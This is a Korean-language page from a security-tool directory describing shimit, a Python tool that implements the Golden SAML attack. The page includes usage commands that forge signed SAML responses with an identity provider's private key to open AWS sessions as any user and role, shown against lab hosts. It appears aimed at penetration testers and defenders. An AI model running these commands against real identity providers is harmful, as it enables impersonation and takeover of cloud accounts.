Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
shimit — Golden SAML 공격을 구현하는 도구 | Kitploit
도구/GitHubGitHub/cyberark/shimit
Payload GenerationExploitationPenetration TestingCloud SecurityAuthentication
GitHubcyberark/shimit

shimit

Golden SAML 공격을 구현하는 도구

저장소 보기
345568년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

shimit

shimit는 Golden SAML 공격을 구현하는 Python 도구입니다. 이에 대한 자세한 내용은 다음 글에서 확인할 수 있습니다.

root@kitploit:~
python .\shimit.py -h
usage: shimit.py [-h] -pk KEY [-c CERT] [-sp SP] -idp IDP -u USER [-reg REGION]
                 [--SessionValidity SESSION_VALIDITY] [--SamlValidity SAML_VALIDITY] -n SESSION_NAME
                 -r ROLES -id ARN [-o OUT_FILE] [-l LOAD_FILE] [-t TIME]
                 
              ██╗   ███████╗██╗  ██╗██╗███╗   ███╗██╗████████╗     ██╗ ██╗  
             ██╔╝   ██╔════╝██║  ██║██║████╗ ████║██║╚══██╔══╝    ██╔╝ ╚██╗ 
            ██╔╝    ███████╗███████║██║██╔████╔██║██║   ██║      ██╔╝   ╚██╗
            ╚██╗    ╚════██║██╔══██║██║██║╚██╔╝██║██║   ██║     ██╔╝    ██╔╝
             ╚██╗   ███████║██║  ██║██║██║ ╚═╝ ██║██║   ██║    ██╔╝    ██╔╝ 
              ╚═╝   ╚══════╝╚═╝  ╚═╝╚═╝╚═╝     ╚═╝╚═╝   ╚═╝    ╚═╝     ╚═╝  

개요

Golden SAML 공격에서 공격자는 SAML 인증을 지원하는 모든 애플리케이션에 원하는 권한으로 접근하고, 대상 애플리케이션의 어떤 사용자든 될 수 있습니다.

shimit은 사용자가 서명된 SAMLResponse 객체를 생성하고 이를 사용하여 서비스 제공자(Service Provider)에 세션을 열 수 있도록 합니다. 현재 shimit은 AWS 콘솔을 _서비스 제공자_로 지원하며, 더 많은 서비스 제공자를 지원할 예정입니다.

AWS

_SAMLResponse_의 _assertion_을 생성하고 서명한 후, shimit은 AWS의 AssumeRoleWithSAML() API를 호출합니다. 그런 다음 세션 토큰과 키가 새 세션에 적용되며, 사용자는 golden SAML을 통해 얻은 권한을 사용하여 aws cli로 작업을 수행할 수 있습니다.

요구 사항:

필요한 모듈을 설치하려면 다음 명령을 실행하세요:

root@kitploit:~
python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml

AWS cli

획득한 자격 증명을 사용하려면 AWS CLI가 설치되어 있어야 합니다. Windows 또는 Linux용 CLI를 해당 링크에서 다운로드할 수 있습니다.

사용법:

AWS CLI용 세션 적용

root@kitploit:~
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n [email protected] -r ADFS-admin -r ADFS-monitor -id 123456789012

idp - ID 공급자 URL (예: http://server.domain.com/adfs/services/trust)

pk - 개인 키 파일 전체 경로 (pem 형식)

c - 인증서 파일 전체 경로 (pem 형식)

u - 사용자 및 도메인 이름 (예: domain\username, *nix에서는 \ 또는 따옴표 사용)

n - AWS의 세션 이름

r - AWS에서 원하는 역할. 여러 역할을 지원하며, 첫 번째로 지정된 역할이 가정됩니다.

id - AWS 계정 ID (예: 123456789012)

SAMLResponse를 파일로 저장

root@kitploit:~
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n [email protected] -r ADFS-admin -r ADFS-monitor -id 123456789012 -o saml_response.xml

o - 인코딩된 SAMLResponse를 지정된 파일 경로에 출력

파일에서 SAMLResponse 로드

root@kitploit:~
python .\shimit.py -l saml_response.xml

l - 지정된 파일 경로에서 SAMLResponse 로드

기여

현재 shimit은 개념 증명(POC)으로 AWS를 서비스 제공자로 지원합니다. 다른 서비스 제공자용 새 모듈을 기여해 주시기를 적극 권장합니다.

도구 다운로드